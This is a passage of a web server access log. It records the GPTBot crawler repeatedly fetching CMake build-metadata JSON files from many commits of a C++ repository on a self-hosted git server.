"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12464] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13735] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10788] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13534] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13917] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12748] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12463] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12460] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12435] [Gzip 6.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13736] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10788] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] 